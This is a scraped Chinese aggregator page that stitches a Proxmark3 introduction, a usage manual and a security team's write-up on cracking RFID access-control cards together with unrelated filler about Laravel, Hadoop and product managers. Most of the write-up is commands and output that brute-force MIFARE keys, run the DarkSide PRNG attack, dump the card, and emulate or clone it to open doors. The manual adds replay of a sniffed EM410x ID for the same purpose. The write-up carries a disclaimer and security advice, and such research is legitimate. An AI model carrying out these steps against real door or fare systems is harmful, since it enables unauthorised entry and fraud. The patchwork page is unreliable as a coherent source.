有玩proxmark3 破解社保卡Easy RFID的吗

来源:蜘蛛抓取(WebSpider) 时间:2016-08-10 06:22 标签: proxmark
RFID开发利器 proxmark3
RFID开发利器 proxmark3
[摘要:Proxmark3 先容 Proxmark3是由Jonathan Westhues计划而且开辟的开源硬件,其首要用RFID的嗅探、读与和克隆等的操纵。 其民圆网站为:Jonathan Westhues小我网站Proxmark3民网:PROXMARK.orgProxmark3发卖]
Proxmark3 介绍
Proxmark3是由Jonathan Westhues设计并且开发的开源硬件,其主要用RFID的嗅探、读取以及克隆等的操作。其官方网站为:Jonathan Westhues个人网站&Proxmark3官网:PROXMARK.org&Proxmark3销售网站:Proxmark3销售网站
The proxmark3 is a powerful general purpose RFID tool, the size of a deck of cards, designed to snoop, listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.
From the&original website&:
This device can do almost anything involving almost any kind of low ( 125 kHz) or high ( 13.56 MHz) frequency RFID tag. It can act as a reader. It can eavesdrop on a transaction between another reader and a tag. It can analyse the signal received over the air more closely, for example to perform an attack in which we derive information from the tag&s instantaneous power consumption. It can pretend to be a tag itself. It is also capable of some less obviously useful operations that might come in handy for development work.
Introduction
This section dives in more details into the Proxmark3 hardware. It does not go nearly as deep as advanced electronics experts would like, but you are welcome to improve this description by providing your own material&
Proxmark3 capabilities
CPU : ARM, 256kB of flash memory, 64kB of RAM
FPGA : Xilinx Spartan-II
Two independent RF circuits, HF and LF
Power : through USB port
Connectivity : mini-USB port
User interface : one button, four LEDs.
Fully open-source design, both HW and SW
Basically, and unless proven otherwise, the idea is that the FPGA is just powerful enough to do the low level modulation/demodulation (-A, -B, ASK, OOK, etc), whereas the CPU should handle the coding/decoding of the frames (Manchester, Miller, etc) as well as more advanced functions.
Proxmark3&
/p/proxmark3/wiki/HomePage
/Proxmark/proxmark3/wiki
感谢关注 Ithao123精品文库频道,是专门为互联网人打造的学习交流平台,全面满足互联网人工作与学习需求,更多互联网资讯尽在 IThao123!
Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。
Hadoop是一个由Apache基金会所开发的分布式系统基础架构。
用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力进行高速运算和存储。
Hadoop实现了一个分布式文件系统(Hadoop Distributed File System),简称HDFS。HDFS有高容错性的特点,并且设计用来部署在低廉的(low-cost)硬件上;而且它提供高吞吐量(high throughput)来访问应用程序的数据,适合那些有着超大数据集(large data set)的应用程序。HDFS放宽了(relax)POSIX的要求,可以以流的形式访问(streaming access)文件系统中的数据。
Hadoop的框架最核心的设计就是:HDFS和MapReduce。HDFS为海量的数据提供了存储,则MapReduce为海量的数据提供了计算。
产品设计是互联网产品经理的核心能力,一个好的产品经理一定在产品设计方面有扎实的功底,本专题将从互联网产品设计的几个方面谈谈产品设计
随着国内互联网的发展,产品经理岗位需求大幅增加,在国内,从事产品工作的大部分岗位为产品经理,其实现实中,很多从事产品工作的岗位是不能称为产品经理,主要原因是对产品经理的职责不明确,那产品经理的职责有哪些,本专题将详细介绍产品经理的主要职责
IThao123周刊proxmark3使用指导手册
1、硬件自检一般情况下,拿到的Proxmark3已经刷写了官方最新的固件。连接到电脑的时候,所有的灯都会亮一下,然后三个在同一排的灯先灭,最后那个红灯也灭,同时听到继电器嗒的响一声,这样代表电路板工作正常。...
1、硬件自检
一般情况下,拿到的Proxmark3已经刷写了官方最新的固件。连接到电脑的时候,所有的灯都会亮一下,然后三个在同一排的灯先灭,最后那个红灯也灭,同时听到继电器“嗒”的响一声,这样代表电路板工作正常。
2、安装驱动(xp环境下)
打开我的电脑》右键--属性》硬件—设备管理器》人体学输入设备
这个“HID-compliant device”就是我们的proxmark3设备,选择“USB 人体学输入设备”一般是最下面那个,注意:不是“HID-compliant device”,更新驱动程序。
下一步继续安装完成。安装完成之后在设备管理器里面可以看到proxmark3的新驱动。
3、安装软件(xp环境下)
一般用到的有两个,直接打开地址:/p/proxmark3/downloads/list,windows平台下载proxmark3_win_bins_beta.zip 解压开,打开proxmark3_win_bins/bin下的proxmark3.exe即可使用。
但是为了获取使用最新版本软件,请最好同时下载ProxSpace-0.7z ,然后本机安装TortoiseSVN(官方下载地址http://tortoisesvn.net/downloads,也可其他途径下载简体中文版本),把这个压缩包解压开,然后修改根目录下的配置文件runme.bat,把环境变量设置为自己的程序所解压的目录位置,这个是我的(set MYPATH=C:\hack\RFID\ProxSpace)
然后双击运行runme.bat,输入make就可以编译最新客户端软件,不过最好先把pm3目录,右键SVN 更新(我的是SVN中文版),如果你初次使用svn软件,需要填入谷歌官方svn更新地址/svn/trunk/ 然后等它更新完成。
之后开始编译,就是运行runme.bat之后输入命令make。
这样ProxSpace\pm3\client下就是最新的几个exe程序,包含proxmark3.exe、snooper.exe、flasher.exe、cli.exe你可以复制替换掉你之前从官方下载的proxmark3_win_bins\bin里面的,但是这个时候可能会提示出错少一个libpthread-2.dll文件,可以在ProxSpace\mingw\bin下复制过来,这样你原来的程序目录下就可以运行最新版本的程序了。
4、软件使用(xp环境下)
4.1基本使用,测试电压命令:hw tune (最好先别在天线上面放卡)
测试高频电压可用命令:hf tune 命令来连续测电压,按下板上的按键停止。一般电压达到高于5v就可正常使用。
4.2 高频相关
读一个mifare高频卡,放一个卡到proxmark3电路板的天线那里,输入:hf 14a reader
输入:hf 14a snoop 这个时候打开卡操作软件,抓取RFID通信内容:
然后输入:hf 14a list 查看抓取内容
查看第一个扇区数据:hf mf rdbl 0 a ffffffffffff (12f=密码)
mifare卡密码演示,输入:hf mf mifare
得到一个Nt key,然后下一步:hf mf fea1b170,破解出默认密码为:a0a1a2a3a4a5
针对mifare的有:
proxmark3& hf mf
Set default debug mode
Read MIFARE classic block
读mifare卡的一个块
Read MIFARE classic sector 读mifare卡的一个扇区
Write MIFARE classic block 写mifare卡的一个块
Test block up to 8 keys
Read parity error messages. param - &used card nonce& 就是那个dark side的应用
Test nested authentication
nested命令,需要知道一个密钥
Simulate MIFARE 1k card
伪装成一个卡片
Clear simulator memory block清除仿真内存
Set simulator memory block
设置仿真内存
Get simulator memory block
获取仿真内存
Load from file emul dump
加载dump文件
Save to file emul dump
保存dump文件
Fill simulator memory with help of keys from simulator填充key
Print keys from simulator memory 打印key
更多操作请看/p/proxmark3/wiki/Mifare
4.3 低频相关
第一步,读取一个em41低频卡,输入:lf em4x em410xwatch
第二步:拿到UID后,去门禁或者验证端将低频天线放置读卡器上:
lf em4x em410xsim &Tag uid&
&Tag uid& 指图中破解出来的ID ,之后出现send data 的提示几秒钟就可以打开门禁了。
输入lf:查看低频相关内容
更多内容请查看proxmark3谷歌官方帮助文档,地址如下:/p/proxmark3/wiki/HomePage?tm=6RFID Hacking ④:ProxMark3 破解门禁 - 推酷
RFID Hacking ④:ProxMark3 破解门禁
t@漏洞盒子安全团队
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的网络,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)
北上广不相信眼泪 16集
在这一背景下,我们不经思考: 门禁系统作为企业物理第一道屏障,这些硬件基础设施安全是否一直都被忽视?
0&01 准备工作
Linux、Windows环境搭建可参考:
1.1 进入PM3工作终端
./proxmark3 /dev/ttyACM0
1.2 测试天线
proxmark3& hw tune
# LF antenna: 29.98 V @
125.00 kHz
# LF antenna: 30.39 V @
134.00 kHz
# LF optimal: 36.30 V @
129.03 kHz
# HF antenna: 27.90 V @
proxmark3&
1.3 设备固件
proxmark3& hw ver#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect
#db# os: /-suspect
#db# HF FPGA image built on
at 08:41:42
0&02 爆破&枚举秘钥
2.1 读取卡片
proxmark3& hf 14a readerATQA : 04 00
UID : 2c f0 55 0b
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443a-4 card found, RATS not supported
2.2 执行NESTED攻击,枚举&爆破key:
proxmark3& hf mf chk *1 ? tNo key specified,try default keys
chk default key[0] ffffffffffff
chk default key[1]
chk default key[2] a0a1a2a3a4a5
chk default key[3] b0b1b2b3b4b5
chk default key[4] aabbccddeeff
chk default key[5] 4d3a99c351dd
chk default key[6] 1a982c7e459a
chk default key[7] d3f7d3f7d3f7
chk default key[8] 714c5c886e97
chk default key[9] 587ee5f9350f
chk default key[10] a
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--SectorsCnt:0 block no:0x03 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:0 block no:0x03 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:B key count:13
Found valid key:[ffffffffffff]
proxmark3&
成功获得卡片key。
2.3 利用PRNG漏洞,执行mifare “DarkSide”攻击
proxmark3& hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press the key on the proxmark3 device to abort both proxmark3 and client. ------------------------------------------------------------------------- uid(2cf0550b) nt(218e1cd8) par(0000) ks(090a070d060b0501) nr() &&&&&&&& & |diff|{nr}&&& |ks3|ks3^5|parity&&&&&&&& | +----+--------+---+-----+---------------+ | 00 | |& c& |0,0,0,0,0,0,0,0| | 20 || a |& f& |0,0,0,0,0,0,0,0| | 40 | |& 2& |0,0,0,0,0,0,0,0| | 60 || d |& 8& |0,0,0,0,0,0,0,0| | 80 | |& 3& |0,0,0,0,0,0,0,0| | a0 || b |& e& |0,0,0,0,0,0,0,0| | c0 || 5 |& 0& |0,0,0,0,0,0,0,0| | e0 || 1 |& 4& |0,0,0,0,0,0,0,0| parity is all zero,try special attack!just wait for few more seconds...&&&&&&&& & key_count:0 Key not found (lfsr_common_prefix list is null). Nt=218e1cd8&&&&&&&& & Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...&&&&&&&& & uid(2cf0550b) nt(218e1cd8) par(0000) ks(0dc04) nr() &&&&&&&& & |diff|{nr}&&& |ks3|ks3^5|parity&&&&&&&& | +----+--------+---+-----+---------------+ | 00 || d |& 8& |0,0,0,0,0,0,0,0| | 20 | |& 1& |0,0,0,0,0,0,0,0| | 40 | |& 2& |0,0,0,0,0,0,0,0| | 60 | |& 6& |0,0,0,0,0,0,0,0| | 80 || d |& 8& |0,0,0,0,0,0,0,0| | a0 || 7 |& 2& |0,0,0,0,0,0,0,0| | c0 || c |& 9& |0,0,0,0,0,0,0,0| | e0 || 4 |& 1& |0,0,0,0,0,0,0,0| parity is all zero,try special attack!just wait for few more seconds...&&&&&&&& & key_count:0 Key not found (lfsr_common_prefix list is null). Nt=218e1cd8&&&&&&&& & Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...&&&&&&&& & &&&&&&&&&&& & uid(2cf0550b) nt(218e1cd8) par(0000) ks(0d040e0e0c010e00) nr() &&&&&&&& & |diff|{nr}&&& |ks3|ks3^5|parity&&&&&&&& | +----+--------+---+-----+---------------+ | 00 || d |& 8& |0,0,0,0,0,0,0,0| | 20 | |& 1& |0,0,0,0,0,0,0,0| | 40 || e |& b& |0,0,0,0,0,0,0,0| | 60 || e |& b& |0,0,0,0,0,0,0,0| | 80 || c |& 9& |0,0,0,0,0,0,0,0| | a0 || 1 |& 4& |0,0,0,0,0,0,0,0| | c0 || e |& b& |0,0,0,0,0,0,0,0| | e0 || 0 |& 5& |0,0,0,0,0,0,0,0| parity is all zero,try special attack!just wait for few more seconds...&&&&&&&& & p1:0 p2:0 p3:0 key:ffffffffffff p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9 p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de p1:3de0e p2:2 key:968a7a09c714 p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed p1:54f81 p2:3 key:6ecaf371a99d p1:58b75 p2:3 key:b p1:616dd p2:3998a p3:8 key:59747d7fdf41 p1:6ab54 p3:9 key:56476bbef406 p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91 p1:6dc19 p2:40e78 p3:b key:4 p1:708f8 p2:42956 p3:c key:3f83eb143dd6 p1:7abf0 p2:48987 p3:d key:2e2b8565f96b p1:7b298 p2:48d82 p3:e key:2d70e3e30b p2:4e219 p3:f key:1e238b63e204 p1:8ce60 p2:5 key:0f4b7cb380a5 key_count:17 ------------------------------------------------------------------ Key found:ffffffffffff &&&&&&&& & Found valid key:ffffffffffff&&&&&&&& & proxmark3&
通过这一方式,同样可以获得卡片的key,不过很多时候还是要靠运气,因为不是所有的卡片都存在这种漏洞。如果不存在PRNG漏洞,我们则需要通过嗅探卡片和读卡器之间通信的数据包解出卡片的Key。
使用PM3进行中间人攻击嗅探通信数据包的方法可参考:
,以及RadioWar团队的
0&03 dump卡片数据&数据处理
使用上述方法,我们成功获得卡片key,接下来我们便可以使用key导出卡片中的所有数据(dumpdata)
proxmark3& hf mf nested 1 0 A ffffffffffff d
--block no:00 key type:00 key:ff ff ff ff ff ff
Block shift=0
Testing known keys. Sector count=16
Time in nested: 0.030 (inf sec per key)
-----------------------------------------------
Iterations count: 0
|---|----------------|---|----------------|---|
|sec|key A
|res|key B
|---|----------------|---|----------------|---|
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
ffffffffffff
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
proxmark3&
在这一过程中,在PM3当前工作目录下生成了dumpkey.bin文件:
接下来我们执行hf mf dump便能获得整张卡片的数据:
proxmark3& hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
Command execute timeout
Sending bytes to proxmark failed
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
proxmark3&
此时,卡片数据已经被导出到PM3主目录下的dumpdata.bin这个二进制文件中,:
但是PM3并不能识别、使用二进制文件,我们还需要使用脚本将这一个二进制文件转换成eml格式的文本信息:
proxmark3& script run dumptoemul.lua --- Executing: ./scripts/dumptoemul.lua, args''Wrote an emulator-dump to the file 2CF0550B.eml-----Finishedproxmark3&
dumptoemul脚本成功将dumpdata.bin二进制文件转换成以卡片ID值命名的eml格式文件:
我们来对比一下这两个文件:
效果已经很明显了,脚本已经将乱码的二进制文件转换成了txt文本信息。
dumptoemul.lua脚本的功能也可以用Python语言来实现: bin2txet.py
#!/usr/bin/python
from __future__ import with_statement
import sys
import binascii
READ_BLOCKSIZE = 16
def main(argv):
argc = len(argv)
if argc & 3:
print 'Usage:', argv[0], 'dumpdata.bin output.txt'
sys.exit(1)
with file(argv[1], &rb&) as file_inp, file(argv[2], &w&) as file_out:
while True:
byte_s = file_inp.read(READ_BLOCKSIZE)
if not byte_s:
hex_char_repr = binascii.hexlify(byte_s)
file_out.write(hex_char_repr)
file_out.write(&\n&)
if __name__ == '__main__':
main(sys.argv)
python bin2text.py dumpdata.bin output.txt
mv output.txt 2CF0550B.eml
清除仿真内存的各区块数据:
hf mf eclr
把从卡片中导出的数据加载到PM3设备中:
proxmark3& hf mf eload 2CF0550B
Loaded 64 blocks from file: 2CF0550B.eml
使用PM3模拟门禁卡:
proxmark3& hf mf sim
uid:N/A, numreads:0, flags:0 (0x00)
#db# 4B UID: 2CF0550B
proxmark3&
这时我们可以使用PM3来实现通过门禁。另外一种方式:把从卡片导出的数据从PM3设备内存中克隆到白卡里,使用克隆卡片通过门禁
proxmark3& hf mf cload e
Cant get block: 1
0&04 安全建议
目前我国80%的门禁产品均是采用原始IC卡的UID号或ID卡的ID号去做门禁卡,没有去进行加密认证或开发专用的密钥,其安全隐患远比Mifare卡的破解更危险,非法破解的人士只需采用专业的技术手段就可以完成破解过程。
门禁厂商、管理员:做好防护工作加强安全意识,尽量避免使用默认key、安全性低的key;对卡片和门禁读卡器使用身份认证&验证机制,绝对不能直接使用原始IC卡的UID号或ID卡的ID号去做门禁卡!
用户:妥善保管自己的门禁卡,避免信息泄露。
物联网IOT的高速发展,无线通信技术的应用也日趋广泛。本文仅通过门禁系统案例揭露NFC、RFID相关协议&技术存在的一些安全隐患。
我们现实生活中也有真实存在的案例:2010年北京一卡通被爆存在漏洞,可随意修改卡内余额,个人猜测这里很有可能是通过利用mifare卡片的PRNG漏洞来实现的。2014年,国外安全研究员发现台湾铁路、公交系统的悠游卡(EasyCard)同样存在PRNG漏洞,可修改卡片余额,并向悠游卡公司反馈报告了这一漏洞:
已发表评论数()
请填写推刊名
描述不能大于100个字符!
权限设置: 公开
仅自己可见
正文不准确
标题不准确
排版有问题
主题不准确
没有分页内容
图片无法显示
视频无法显示
与原文不一致

我要回帖

更多关于 proxmark 的文章

 

随机推荐